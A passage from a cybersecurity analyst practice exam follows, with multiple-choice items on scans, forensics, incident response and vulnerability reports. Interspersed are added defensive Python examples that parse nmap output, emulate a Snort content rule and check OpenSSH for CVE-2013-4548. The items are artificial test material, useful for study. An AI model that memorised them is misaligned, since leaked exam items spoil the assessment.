[Network diagram: the Internet, a File Server, and a DMZ containing the Email Server and the Web Server.]

A. The scans are being blocked by an intrusion prevention system.
B. The scans are being blocked by an Apache .htaccess file.
C. The scans are being blocked by a network firewall.
D. The scans are being blocked by a host firewall.



6. Sam is looking for evidence of software that was installed on a Windows 10 system. He believes that the programs were deleted and that the suspect used both registry and log cleaners to hide evidence. What Windows feature can’t he use to find evidence of the use of these programs?

A. The MFT
B. Volume shadow copies
C. The shim (application compatibility) cache
D. Prefetch files



7. Patricia is evaluating the security of an application developed within her organization. She would like to assess the application’s security by supplying it with invalid inputs. What technique is Patricia planning to use?

A. Fault injection
B. Stress testing
C. Mutation testing
D. Fuzz testing



8. A port scan conducted during a security assessment shows the following results. What type of device has most likely been scanned?

Nmap scan report for EXAMPLE (192.168.1.79)
Host is up (1.00s latency).
Not shown: 992 closed ports
PORT     STATE
21/tcp   open
23/tcp   open
80/tcp   open
280/tcp  open
443/tcp  open
515/tcp  open
631/tcp  open
9100/tcp open

Nmap done: 1 IP address (1 host up) scanned in 124.20 seconds

A. A wireless access point
B. A server
C. A printer
D. A switch
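The reasoning behind Nancy’s switch scan (question 4) and the printer scan above, as an added example that is not code from the book: a parser for nmap’s normal output that classifies the device from its port profile and flags the cleartext management services. The two scan listings embedded below are constructed copies of the ones on the page; the device fingerprint is a deliberately crude port-only heuristic and is labelled as such.

```python
"""Parse nmap normal output and turn open ports into triage findings.

Added example, not from the book. SWITCH_SCAN and PRINTER_SCAN are
constructed copies of the two listings above; guess_device() is a crude
port-profile heuristic, not a substitute for service/version detection.
"""
import re

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(open\|filtered|open|closed|filtered)\b")

SWITCH_SCAN = """\
Nmap scan report for 10.1.0.121
Host is up (0.049s latency).
Not shown: 966 closed ports
PORT      STATE
22/tcp    open
23/tcp    open
80/tcp    filtered
443/tcp   open
631/tcp   filtered
8192/tcp  filtered
8193/tcp  filtered
8194/tcp  filtered
28201/tcp filtered
"""

PRINTER_SCAN = """\
Nmap scan report for EXAMPLE (192.168.1.79)
Host is up (1.00s latency).
Not shown: 992 closed ports
PORT     STATE
21/tcp   open
23/tcp   open
80/tcp   open
280/tcp  open
443/tcp  open
515/tcp  open
631/tcp  open
9100/tcp open
"""

# Open ports that imply a cleartext protocol: anyone on the same VLAN can
# capture or replay the credentials that cross them.
CLEARTEXT = {21: "ftp", 23: "telnet", 80: "http", 110: "pop3", 143: "imap"}
PRINTER_PORTS = {515, 631, 9100}          # lpd, ipp, jetdirect


def parse_nmap(text: str) -> dict:
    """Return the host line and a {port: state} map for every port line."""
    result = {"host": None, "ports": {}}
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            result["host"] = line[len("Nmap scan report for "):].strip()
            continue
        m = PORT_LINE.match(line)
        if m:
            result["ports"][int(m.group(1))] = m.group(3)
    return result


def guess_device(open_ports: set) -> str:
    """Crude fingerprint from ports alone: two or more print-spooler ports."""
    if len(open_ports & PRINTER_PORTS) >= 2:
        return "printer"
    return "unknown"


def findings(text: str) -> dict:
    scan = parse_nmap(text)
    open_ports = {p for p, st in scan["ports"].items() if st == "open"}
    cleartext = sorted(p for p in open_ports if p in CLEARTEXT)
    return {
        "host": scan["host"],
        "open": sorted(open_ports),
        "device": guess_device(open_ports),
        "cleartext_management": [f"{p}/tcp {CLEARTEXT[p]}" for p in cleartext],
        # Telnet on a switch is the one to escalate: management credentials
        # in the clear. Filtered ports are already unreachable from here.
        "worst": 23 if 23 in open_ports else (cleartext[0] if cleartext else None),
    }


if __name__ == "__main__":
    for scan in (SWITCH_SCAN, PRINTER_SCAN):
        print(findings(scan))
```

The `filtered` entries in Nancy’s output (80, 631, 8192 to 8194, 28201) are the ones an ACL already blocks from her VLAN, so they drop out of the findings; what remains is 23/tcp open on a switch, which the parser ranks ahead of SSH and HTTPS.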
9. Kim is reviewing the data gathered by the first responder to a security incident and comes across a text file containing the output shown here. What command generated this output?

Proto Recv-Q Send-Q Local Address               Foreign Address              State
tcp        0      0 ip-172-30-0-60.ec2.in:60694 s3-1-w.amazonaws.com:http    TIME_WAIT
tcp        0      0 ip-172-30-0-60.ec2.in:53350 s3-1-w.amazonaws.com:http    TIME_WAIT
tcp        0      0 ip-172-30-0-60.ec2.in:60692 s3-1-w.amazonaws.com:http    TIME_WAIT
tcp        0      0 ip-172-30-0-60.ec2.in:38444 10.14.230.124:http           TIME_WAIT
tcp        0     49 ip-172-30-0-60.ec2.inte:ssh 10.14.230.147:53680          ESTABLISHED
tcp        0      0 ip-172-30-0-60.ec2.in:53348 s3-1-w.amazonaws.com:http    TIME_WAIT
tcp        0      0 ip-172-30-0-60.ec2.int:http engine16.uptimerobot.:21330  TIME_WAIT

A. traceroute
B. netstat
C. ifconfig
D. sockets

10. Which of the following is not one of the major categories of security event indicators described by NIST 800-61?

A. Alerts from IDS, IPS, SIEM, AV, and other security systems
B. Logs generated by systems, services, and applications
C. Exploit developers
D. Internal and external sources

11. During an nmap scan of a network, Charles receives the following response from nmap:

Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-21 20:03 EDT
Nmap done: 256 IP addresses (0 hosts up) scanned in 29.74 seconds

What can Charles deduce about the network segment from these results?

A. There are no active hosts in the network segment.
B. All hosts on the network segment are firewalled.
C. The scan was misconfigured.
D. Charles cannot determine if there are hosts on the network segment from this scan.

12. Joe is designing a vulnerability management program for his company, a hosted service provider. He would like to check all relevant documents for customer requirements that may affect his scanning. Which one of the following documents is least likely to contain this information?

A. BPA
B. SLA
C. MOU
D. BIA
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13. During a port scan of a server, Gwen discovered that the following ports are open on the 
internal network: 


TCP port 25 
TCP port 80 
TCP port 110 
TCP port 443 
TCP port 1521 
TCP port 3389 


Of the services listed here, for which one does the scan not provide evidence that it is likely 
running on the server? 


A. Web 

B. Database 
C. SSH 

D. Email 


14. As part of her forensic analysis of a wiped thumb drive, Selah runs Scalpel to carve data 
from the image she created. After running Scalpel, she sees the following in the audit.txt 
log file created by the program. What should Selah do next? 

sansforensics@siftworkstation:~/Downloads/scalpelout$ more audit.txt 
Scalpel version 1.60 audit file 

Started at Sun Apr 23 20:59:18 2017 

Command line: 
scalpel -v RHINOUSB.dd -o scalpelout 

Output directory: /home/sansforensics/Downloads/scalpelout 
Configuration file: /etc/scalpel/scalpel.conf 

Opening target "/home/sansforensics/Downloads/RHINOUSB.dd" 

The following files were carved: 

File          Start      Chop  Length    Extracted From 
00000007.jpg  54481408   NO    230665    RHINOUSB.dd 
00000006.jpg  54473216   NO    6809      RHINOUSB.dd 
00000005.jpg  54206976   NO    264600    RHINOUSB.dd 
00000004.jpg  53793280   NO    411361    RHINOUSB.dd 
00000003.jpg  53375488   NO    415534    RHINOUSB.dd 
00000002.jpg  53277184   NO    95814     RHINOUSB.dd 
00000001.gif  54727168   NO    4105      RHINOUSB.dd 
00000000.gif  54714880   NO    11407     RHINOUSB.dd 
00000008.jpg  171561472  NO    264600    RHINOUSB.dd 
00000010.doc  171528704  YES   10000000  RHINOUSB.dd 
00000009.doc  171528704  NO    10000000  RHINOUSB.dd 

A. Run a data recovery program on the drive to retrieve the files. 
B. Run Scalpel in filename recovery mode to retrieve the actual filenames and directory 
structures of the files. 
C. Review the contents of the scalpelout folder. 
D. Use the identified file names to process the file using a full forensic suite. 


15. As part of a government acquisitions program for the U.S. Department of Defense, Sean is 
required to ensure that the chips and other hardware-level components used in the switches, 
routers, and servers that he purchases do not include malware or other potential attack 
vectors. What type of supplier should Sean seek out? 

A. A TPM 
B. An OEM provider 
C. A trusted foundry 
D. A gray-market provider 

16. One of the servers that Adam is responsible for recently ran out of disk space. Despite 
system-level alarms, the problem was not detected, resulting in an outage when the server 
crashed. How would this issue be categorized if the NIST threat categorization method was 
used as part of an after-action review? 

A. Environmental 
B. Adversarial 
C. Accidental 
D. Structural 

17. Ben would like guidance on grouping information into varying levels of sensitivity. He 
plans to use these groupings to assist with decisions around the security controls that the 
organization will apply to storage devices containing that information. Which one of the 
following policies is most likely to contain relevant information for Ben’s decision-making 
process? 

A. Data retention policy 
B. Data classification policy 
C. Data encryption policy 
D. Data disposal policy 

18. Erin is attempting to collect network configuration information from a Windows system on 
her network. She is familiar with the Linux operating system and would use the ifconfig 
command to obtain the desired information on a Linux system. What equivalent command 
should she use in Windows? 

A. ipconfig 
B. netstat 
C. ifconfig 
D. netcfg 
19. Lonnie ran a vulnerability scan of a server that he recently detected in his organization that 
is not listed in the organization’s configuration management database. One of the vulnerabilities 
detected is shown here. What type of service is most likely running on this server? 

Severity: 3  phpinfo Information Disclosure Vulnerability  port 80/tcp  CVSS: -  CVSS3: -  Active 
First Detected: 07/17/2016 at 12:02:41 (GMT-0400)  Last Detected: 04/09/2017 at 17:39:08 (GMT-0400)  Times Detected: 38  Last Fixed: N/A 
QID: 10464                       CVSS Base: [not legible in the scan] 
Category: CGI                    CVSS Temporal: 3.8 
CVE ID: -                        CVSS3 Base: - 
Vendor Reference: -              CVSS3 Temporal: 
Bugtraq ID: -                    CVSS Environment: 
Service Modified: 06/21/2015     Asset Group: 
User Modified: -                 Collateral Damage Potential: 
Edited: No                       Target Distribution: 
PCI Vuln: Yes                    Confidentiality Requirement: 
Ticket State:                    Integrity Requirement: 
                                 Availability Requirement: 

THREAT: 
This host has a publicly-accessible PHP file that calls the phpinfo() function (or some other function similar to it). 

If a user requests this file (such as via an Internet browser), the user may obtain a page containing sensitive information about the Web server host. The information displayed to the user could include the exact version numbers of various software products (Operating Systems, Web Servers, PHP, XML, MySQL), the values of some environment variables ($PATH, $SYSTEM_ROOT), paths to various programs (cmd.exe), and much more. 

To get specific information about the type of data your host displayed, please refer to the "Result" field below. 

IMPACT: 
By exploiting this vulnerability, any user could obtain very sensitive information about the Web server host. This information may aid in attacks against the host. 


A. Database 

B. Web 

C. Time 

D. Network management 


20. Which CompTIA-defined phase of an incident response process includes scanning, validating 
and updating permissions, and patching impacted machines? 


A. Eradication 
B. Validation 
C. Recovery 
D. Reporting 
21. Which NIST attack vector classification best describes a distributed denial-of-service 
attack? 
A. Impersonation 
B. Improper usage 
C. Web 
D. Attrition 
22. Taylor is preparing to run vulnerability scans of a web application server that his organiza- 
tion recently deployed for public access. He would like to understand what information 
is available to a potential external attacker about the system as well as what damage an 


attacker might be able to cause on the system. Which one of the following scan types would 
be least likely to provide this type of information? 


A. Internal network vulnerability scan 
B. Port scan 

C. Web application vulnerability scan 
D. External network vulnerability scan 
23. While analyzing a packet capture in Wireshark, Chris finds the packet shown here. Which 
of the following is he unable to determine from this packet? 

> Frame 1536: 69 bytes on wire (552 bits), 69 bytes captured (552 bits) 
Ethernet II, Src: Apple_cc:57:92 (00:03:93:cc:57:92), Dst: Oracle_f0:13:96 (08:00:20:f0:13:96) 
    > Destination: Oracle_f0:13:96 (08:00:20:f0:13:96) 
    > Source: Apple_cc:57:92 (00:03:93:cc:57:92) 
      Type: IP (0x0800) 
Internet Protocol Version 4, Src: 137.30.122.253 (137.30.122.253), Dst: 137.30.120.40 (137.30.120.40) 
      Version: 4 
      Header length: 20 bytes 
    > Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport)) 
      Total Length: 55 
      Identification: 0xd148 (53576) 
    > Flags: 0x02 (Don't Fragment) 
      Fragment offset: 0 
      Time to live: 128 
      Protocol: TCP (6) 
    > Header checksum: 0x2416 [validation disabled] 
      Source: 137.30.122.253 (137.30.122.253) 
      Destination: 137.30.120.40 (137.30.120.40) 
      [Source GeoIP: Unknown] 
      [Destination GeoIP: Unknown] 
Transmission Control Protocol, Src Port: dec-mbadmin (1655), Dst Port: ftp (21), Seq: 13, Ack: 63, Len: 15 
      Source port: dec-mbadmin (1655) 
      Destination port: ftp (21) 
      [Stream index: 69] 
      Sequence number: 13 (relative sequence number) 
      [Next sequence number: 28 (relative sequence number)] 
      Acknowledgment number: 63 (relative ack number) 
      Header length: 20 bytes 
    > Flags: 0x018 (PSH, ACK) 
      Window size value: 64178 
      [Calculated window size: 64178] 
      [Window size scaling factor: -2 (no window scaling used)] 
    > Checksum: 0x058c [validation disabled] 
    > [SEQ/ACK analysis] 
File Transfer Protocol (FTP) 
      PASS gnome123\r\n 
          Request command: PASS 
          Request arg: gnome123 

A. That the username used was gnome 
B. That the protocol used was FTP 
C. That the password was gnome123 
D. That the remote system was 137.30.120.40 

24. Cynthia’s review of her network traffic focuses on the graph shown here. What occurred in 
late June? 

[Line graph of network throughput in megabit/second over time, with the axis ending at 2016-Jul; the plotted values are not legible in the scan] 

A. Beaconing 
B. High network bandwidth consumption 
C. A denial-of-service attack 
D. A link failure 


25. Ron arrived at the office this morning to find a subpoena on his desk requesting electronic 
records in his control. What type of procedure should he consult to determine appropriate 
next steps, including the people he should consult and the technical process he should 
follow? 


A. Evidence production procedure 
B. Monitoring procedure 
C. Data classification procedure 
D. Patching procedure 
26. Ben is attempting to determine what services a Windows system is running and decides to 
use the netstat -at command to list TCP ports. He receives the output shown here. The 
system is most likely running which services? 

Active Connections 

  Proto  Local Address    Foreign Address    State        Offload State 
  TCP    0.0.0.0:80       example:0          LISTENING    InHost 
  TCP    0.0.0.0:135      example:0          LISTENING    InHost 
  TCP    0.0.0.0:445      example:0          LISTENING    InHost 

A. A plain-text web server, Microsoft file sharing, and a secure web server 
B. SSH, email, and a plain-text web server 
C. An email server, a plain-text web server, and Microsoft-DS 
D. A plain-text web server, Microsoft RPC, and Microsoft-DS 
27. Paul is researching models for implementing an IT help desk and would like to draw upon 


best practices in the industry. Which one of the following standard frameworks would pro- 
vide Paul with the best guidance? 


A. ISO 
B. ITIL 

C. COBIT 
D. PCI DSS 
28. Which stage of the incident response process includes activities such as adding IPS signatures 
to detect new attacks? 

A. Detection and analysis 
B. Containment, eradication, and recovery 
C. Post-incident activity 
D. Preparation 

29. Mike is configuring vulnerability scans for a new web server in his organization. The server 
is located on the DMZ network, as shown here. What type of scans should Mike configure 
for best results? 

[Network diagram: the Internet connects to a DMZ containing the Web Server (10.16.25.103 / 12.6.14.5); the internal network holds the Database Server (192.168.0.22) and the File Server (192.168.0.16)] 

A. Mike should not scan servers located in the DMZ. 
B. Mike should perform only internal scans of the server. 
C. Mike should perform only external scans of the server. 
D. Mike should perform both internal and external scans of the server. 
30. As part of her incident response process on a live Windows system, Alex reviews services 
using services.msc. What finding should Alex take away from her review of this based on 
the image shown here? 

[At this point the scan shows a Wireshark capture window (a DNS PTR query for 15.2.0.10.in-addr.arpa from 10.0.2.11 to 192.168.1.1 and a TCP [SYN] Seq=0 Win=1024 Len=0 MSS=1460 from 10.0.2.11) rather than the services.msc view the question refers to] 

A. Services are running normally. 
B. The system is infected with malware. 
C. The system’s Windows antivirus software is disabled. 
D. The system will not generate logs properly because Event Collector is set to Manual. 


31. Susan is building an incident response program and intends to implement NIST’s recom- 
mended actions to improve the effectiveness of incident analysis. Which of the following 
items is not a NIST-recommended incident analysis improvement? 


A. Perform behavioral baselining. 
B. Create and implement a logging policy. 
C. Set system BIOS clocks regularly. 


D. Maintain an organization-wide system configuration database. 


32. Jim’s nmap port scan of a system showed the following list of ports: 


PORT STATE SERVICE 

80/tcp open http 

135/tcp open msrpc 

139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
902/tcp open iss-realsecure 
912/tcp open apex-mesh 
3389/tcp open ms-wbt-server 


What operating system is the remote system most likely running? 

A. Windows 
B. Linux 
C. An embedded OS 
D. macOS 

33. The Snort IPS that Adam has configured includes a rule that reads as follows: 

alert tcp $EXTERNAL_NET any -> 10.0.10.0/24 80 (msg:"Alert!"; 
content:"http|3a|//www.example.com/download.php"; nocase; 
offset:12; classtype:web-application-activity; sid:5555555; rev:1;) 

What type of detection method is Adam using? 

A. Anomaly based 

B. Trend based 

C. Availability based 

D. Behavioral based 
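The rule above matches on three things: a content string in which |3a| is the hex escape for the ':' character, the nocase modifier, and offset:12. The following is an added example, not code from the book or from Snort itself, that implements just those matching semantics in Python and runs them over two constructed HTTP payloads so the effect of each option is visible.

```python
import re

# Added example (not from the book or from Snort): reproduces the content/nocase/offset
# matching used by Adam's rule. The payloads below are constructed, not captured traffic.


def decode_content(content):
    """Turn a Snort content string such as 'http|3a|//www.example.com/download.php'
    into the raw bytes Snort compares against the packet payload. Text between
    pipes is hexadecimal (|3a| is ':'); everything else is taken literally."""
    out = bytearray()
    for piece in re.split(r"(\|[0-9A-Fa-f ]+\|)", content):
        if piece.startswith("|") and piece.endswith("|") and len(piece) > 2:
            out += bytes.fromhex(piece[1:-1].replace(" ", ""))
        else:
            out += piece.encode("latin-1")
    return bytes(out)


def content_matches(payload, content, nocase=False, offset=0):
    """Snort 'content' check: the pattern must appear in the payload at or after
    byte 'offset'; with 'nocase' the comparison ignores ASCII case."""
    needle = decode_content(content)
    haystack = payload[offset:]
    if nocase:
        needle, haystack = needle.lower(), haystack.lower()
    return needle in haystack


# The options from the rule that affect matching (msg, classtype, sid and rev
# only label the alert once it fires).
RULE = {
    "content": "http|3a|//www.example.com/download.php",
    "nocase": True,
    "offset": 12,
}


def rule_fires(payload):
    """True when the rule's content check matches this TCP payload. The header part
    of the rule (external source to 10.0.10.0/24 port 80) is assumed already met."""
    return content_matches(payload, RULE["content"], RULE["nocase"], RULE["offset"])


# Constructed sample 1: an HTTP request whose Referer header carries the URL in
# upper case. The URL starts well past byte 12 and nocase ignores the case change.
REQUEST_WITH_REFERER = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: intranet.example.test\r\n"
    b"Referer: HTTP://WWW.EXAMPLE.COM/download.php\r\n\r\n"
)
# Constructed sample 2: the same URL at the very start of the payload. offset:12
# skips the first twelve bytes, so the pattern is never seen and the rule is silent.
URL_AT_START = b"http://www.example.com/download.php\r\n"

if __name__ == "__main__":
    print("decoded content:", decode_content(RULE["content"]))
    print("Referer request fires:", rule_fires(REQUEST_WITH_REFERER))  # True
    print("URL at offset 0 fires:", rule_fires(URL_AT_START))         # False
```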


34. Peter works for an organization that is joining a consortium of similar organizations that 
use a federated identity management system. He is configuring his identity management 
system to participate in the federation. Specifically, he wants to ensure that users at his 
organization will be able to use their credentials to access federated services. What role is 
Peter configuring? 


A. Relying party 

B. Service provider 

C. Identity provider 

D. Consumer 

35. Greg is seeking to protect his organization against attacks that involve the theft of user 


credentials. Which one of the following threats poses the greatest risk of credential theft in 
most organizations? 


A. DNS poisoning 

B. Phishing 

C. Telephone-based social engineering 

D. Shoulder surfing 

36. As part of her duties as an SOC analyst, Emily is tasked with monitoring intrusion detection 
sensors that cover her employer’s corporate headquarters network. During her shift, 
Emily’s IDS reports that a network scan has occurred from a system with IP address 


10.0.11.19 on the organization’s unauthenticated guest wireless network aimed at systems 
on an external network. What should Emily’s first step be? 


A. Report the event to the impacted third parties. 

B. Report the event to law enforcement. 

C. Check the system’s MAC address against known assets. 
D. Check authentication logs to identify the logged-in user. 
37. Which of the following commands is not useful for validating user permissions on a Linux 
system? 


A. more /etc/sudoers 


B. groups 
C. stat 
D. strings 


38. Tommy’s company recently implemented a new policy that restricts root access to its cloud 
computing service provider master account. This policy requires that a team member from 
the operations group retrieve a password from a password vault to log in to the account. 
The account then uses two-factor authentication that requires that a team member from the 
security group approve the login. What type of control is the company using? 


A. Separation of duties 

B. Privileged account monitoring 

C. Dual control 

D. Least privilege 

39. Tim works in an environment that is subject to the Payment Card Industry Data Security 
Standard. He realizes that technical constraints prevent the organization from meeting a 
specific PCI DSS requirement and wants to implement a compensating control. Which one of 
the following statements is not true about proper compensating controls? 


A. The control must include a clear audit mechanism. 

B. The control must meet the intent and rigor of the original requirement. 

C. The control must provide a similar level of defense as the original requirement provides. 
D. The control must be above and beyond other requirements. 


40. Lou recently scanned a web server in his environment and received the vulnerability report 
shown here. What action can Lou take to address this vulnerability? 


Severity: 2  SSL Certificate - Signature Verification Failed Vulnerability  port 3389/tcp over SSL  CVSS: -  CVSS3: -  Active 
First Detected: 05/11/2013 at 02:00:07 (GMT-0400)  Last Detected: 04/04/2017 at 21:30:12 (GMT-0400)  Times Detected: 160  Last Fixed: N/A 
QID: 38173                          CVSS Base: 9.4 
Category: General remote services   CVSS Temporal: 6.8 
CVE ID: -                           CVSS3 Base: - 
Vendor Reference: -                 CVSS3 Temporal: 
Bugtraq ID: -                       CVSS Environment: 
Service Modified: 05/22/2009        Asset Group: 
User Modified: -                    Collateral Damage Potential: 
Edited: No                          Target Distribution: 
PCI Vuln: Yes                       Confidentiality Requirement: 
Ticket State:                       Integrity Requirement: 
                                    Availability Requirement: 

THREAT: 
An SSL Certificate associates an entity (person, organization, host, etc.) with a Public Key. In an SSL connection, the client authenticates the remote server using the server's Certificate and extracts the Public Key in the Certificate to establish the secure connection. The authentication is done by verifying that the public key in the certificate is signed by a trusted third-party Certificate Authority. 

If a client is unable to verify the certificate, it can abort communication or prompt the user to continue the communication without authentication. 

IMPACT: 
By exploiting this vulnerability, man-in-the-middle attacks in tandem with DNS cache poisoning can occur. 

Exception: 
If the server communicates only with a restricted set of clients who have the server certificate or the trusted CA certificate, then the server or CA certificate may not be available publicly, and the scan will be unable to verify the signature. 


A. Configure TLS 
B. Replace the certificate 
C. Unblock port 443 
D. Block port 80 


41. Mike’s company recently suffered a security incident when they lost control of thousands of 
personal customer records. Many of these records were from projects that ended long ago 
and served no business purpose. What type of policy, if followed, would have best limited 
the impact of this incident? 


A. Data ownership policy 

B. Account management policy 

C. Acceptable use policy 

D. Data retention policy 

42. Which of the following factors is not typically considered when determining whether evidence 
should be retained? 

A. Media life span 

B. Likelihood of civil litigation 

C. Organizational retention policies 


D. Likelihood of criminal prosecution 


43. Match each of the following with the appropriate element of the CIA triad: 

1. A hard drive failure resulting in a service outage 
2. A termination letter that is left on a printer and read by others in the department 
3. Modification of an email’s content by a third party 

A. 1. Integrity, 2. confidentiality, 3. confidentiality 
B. 1. Integrity, 2. confidentiality, 3. availability 
C. 1. Availability, 2. availability, 3. confidentiality 
D. 1. Availability, 2. confidentiality, 3. integrity 
44. Niesha discovered the vulnerability shown here on a server running in her organization. 
What would be the best way for Niesha to resolve this issue? 

Severity: 4  OpenSSH AES-GCM Cipher Remote Code Execution Vulnerability 

QID: 42420 
Category: General remote services 
CVE ID: CVE-2013-4548 
Vendor Reference: gcmrekey.adv 
Bugtraq ID: 63605 
Service Modified: 06/16/2015 
User Modified: - 
Edited: No 
PCI Vuln: Yes 
Ticket State: 

THREAT: 
A memory corruption vulnerability in post-authentication exists when the Advanced Encryption Standard (AES)-Galois/Counter Mode of Operation 
(GCM) cipher is used for the key exchange. When an AES-GCM cipher is used, the mm_newkeys_from_blob() function in monitor_wrap.c does not 
properly initialize memory for a MAC context data structure, allowing remote authenticated users to bypass intended ForceCommand and login-shell 
restrictions via packet data that provides a crafted callback address. 

The new cipher was added only in OpenSSH 6.2, released on March 22, 2013. 

Affected Software: 
OpenSSH 6.2 and OpenSSH 6.3 when built against an OpenSSL that supports AES-GCM. 

IMPACT: 
A remote authenticated attacker could exploit this vulnerability to execute arbitrary code in the security context of the authenticated user and may 
therefore allow bypassing restricted shell/command configurations. 

SOLUTION: 
Update to OpenSSH 6.4 (http://www.openssh.com/txt/release-6.4) to remediate this vulnerability. 
Workaround: 
As a workaround, customers may disable AES-GCM in the server configuration. The following sshd_config option will disable AES-GCM while leaving 
other ciphers active: 
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc 

Patch: 
OpenSSH 6.4 (http://www.openssh.com/txt/release-6.4) 

COMPLIANCE: 
Not Applicable 

EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 

ASSOCIATED MALWARE: 
There is no malware information for this vulnerability. 

RESULTS: 
SSH-2.0-OpenSSH_6.2 detected on port 22 over TCP. 

A. Disable the use of AES-GCM. 
B. Upgrade OpenSSH. 
C. Upgrade the operating system. 
D. Update antivirus signatures. 
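The report gives two facts an analyst can check for directly: the affected versions (6.2 and 6.3, identified from the SSH banner) and the sshd_config Ciphers line that serves as a workaround. As an added example, not code from the book, Qualys or OpenSSH, the check below applies both to a server banner and a constructed sshd_config fragment; it assumes, as the report's workaround implies, that the default cipher list on those versions includes the AES-GCM suites.

```python
import re

# Added example (not from the book, Qualys or OpenSSH): combines the version range and the
# Ciphers workaround from the report into one assessment. Config fragments are constructed.

# Versions the report lists as affected.
AFFECTED_VERSIONS = {(6, 2), (6, 3)}

BANNER_RE = re.compile(r"SSH-2\.0-OpenSSH_(\d+)\.(\d+)")


def parse_banner(banner):
    """Return (major, minor) from a banner such as 'SSH-2.0-OpenSSH_6.2' or
    'SSH-2.0-OpenSSH_7.4p1 Debian-10'; None if it is not an OpenSSH banner."""
    m = BANNER_RE.match(banner.strip())
    return (int(m.group(1)), int(m.group(2))) if m else None


def banner_is_affected(banner):
    return parse_banner(banner) in AFFECTED_VERSIONS


def configured_ciphers(sshd_config):
    """Return the cipher list from the Ciphers directive, or None when the config does
    not set one (sshd then uses its built-in default list). sshd honours the first
    occurrence of a keyword, so the first Ciphers line is the one that applies."""
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "ciphers":
            return [c for c in parts[1].replace(" ", "").split(",") if c]
    return None


def gcm_enabled(sshd_config):
    """AES-GCM stays in use unless an explicit Ciphers list leaves the GCM suites out.
    Assumption (consistent with the report's workaround): the 6.2/6.3 default list
    includes them, so a missing Ciphers line counts as enabled."""
    ciphers = configured_ciphers(sshd_config)
    if ciphers is None:
        return True
    return any("gcm" in c.lower() for c in ciphers)


def assess(banner, sshd_config):
    """'not_affected' when the version is outside the affected range, 'workaround' when
    an affected version runs with AES-GCM disabled, otherwise 'vulnerable'."""
    if not banner_is_affected(banner):
        return "not_affected"
    return "vulnerable" if gcm_enabled(sshd_config) else "workaround"


# Constructed sshd_config fragments (not taken from any real host).
DEFAULT_CIPHERS_CONFIG = """\
# no Ciphers line: sshd falls back to its default cipher list
Port 22
PermitRootLogin no
"""

WORKAROUND_CONFIG = """\
Port 22
# the line the report gives as a workaround
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc
"""

SCAN_BANNER = "SSH-2.0-OpenSSH_6.2"   # as shown in the RESULTS section of the report

if __name__ == "__main__":
    print(assess(SCAN_BANNER, DEFAULT_CIPHERS_CONFIG))          # vulnerable
    print(assess(SCAN_BANNER, WORKAROUND_CONFIG))               # workaround
    print(assess("SSH-2.0-OpenSSH_6.4", DEFAULT_CIPHERS_CONFIG))  # not_affected
```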
45. As part of her post-incident recovery process, Alicia creates a separate virtual network as 
shown here to contain compromised systems she needs to investigate. What containment 
technique is she using? 

[Network diagram: a Containment VLAN (A) sits behind a firewall that also connects the Data Center and Business Office networks (B and C). Firewall ruleset: Allow all from B, C to A; Deny all from A to B and C] 

A. Segmentation 
B. Isolation 
C. Removal 
D. Reverse engineering 

46. Jennifer is reviewing her network monitoring configurations and sees the following chart 
for a system she runs remotely in Amazon’s Web Services environment more than 400 miles 
away. What can she use this data for? 
[SolarWinds chart "Network Latency & Packet Loss" for node AMI (AWS), Apr 21 2017, 12:30 pm to Apr 22 2017, 12:30 pm: response time in milliseconds (0 to 200 ms scale) and % packet loss (0 to 100% scale) plotted over 24 hours, with the series "Response Time AMI (AWS)" and "% Packet Loss AMI (AWS)"] 

A. Incident response; she needs to determine the issue causing the spikes in response time. 
B. The high packet loss must be investigated, as it may indicate a denial-of-service attack. 
C. She can use this data to determine a reasonable response time baseline. 
D. The high response time must be investigated, as it may indicate a denial-of-service attack. 

294   Chapter 6   Practice Exam 2 

47. The Windows system that Fred is conducting live forensics on shows a partition map, as shown 
here. If Fred believes that a hidden partition was deleted resulting in the unallocated space, which 
of the following tools is best suited to identifying the data found in the unallocated space? 


[Disk Management screenshot: a small partition labelled Healthy (System, Acti...), followed by (C:) 893.71 GB NTFS Healthy (Boot, Page File, Crash Dump, Primary Partition), followed by 449 MB Unallocated] 





A. Scalpel 
B. DBAN 
C. parted 
D. dd 


48. During a postmortem forensic analysis of a Windows system that was shut down after its 
user saw strange behavior, Ben concludes that the system he is reviewing was likely infected 
with a memory-resident malware package. What is his best means of finding the malware? 


A. Search for a core dump or hiberfil.sys to analyze. 

B. Review the INDX files and Windows registry for signs of infection. 

C. Boot the system and then use a tool like the Volatility Framework to capture live memory. 
D. Check volume shadow copies for historic information prior to the reboot. 

49. Randi’s organization recently suffered a cross-site scripting attack, and she plans to implement 


input validation to protect against the recurrence of such attacks in the future. Which one of 
the following HTML tags should be most carefully scrutinized when it appears in user input? 


A. <SCRIPT> 


B. <XSS> 
C. <B> 
D. <EM> 


50. Jessie needs to prevent port scans like the scan shown here. Which of the following is a 
valid method for preventing port scans? 

[Wireshark capture: a DNS PTR query for 15.2.0.10.in-addr.arpa from 10.0.2.11 to 192.168.1.1, followed by a run of TCP [SYN] packets from 10.0.2.11 (for example 36410 -> 1723 [SYN] Seq=0 Win=1024 Len=0 MSS=1460), each with the same Seq=0, Win=1024 and MSS=1460; the remaining rows are not legible in the scan] 

A. Not registering systems in DNS 
B. Using a firewall to restrict traffic to only ports required for business purposes 
C. Using a heuristic detection rule on an IPS 
D. Implementing port security 


51. The IT services company that Ben works for uses the NIST functional impact categories 
to describe the impact of incidents. During a recent construction project, a contractor 
plugged a network device in twice to the same switch, resulting in a network loop and tak- 
ing down the organization’s network for a third of their users. How should Ben classify 
this event? 


A. Urgent 

B. Medium 
C. Important 
D. High 


52. What information can be gathered by observing the distinct default values of the following 
TCP/IP fields during reconnaissance activities: initial packet size, initial TTL, window size, 
maximum segment size, and flags? 


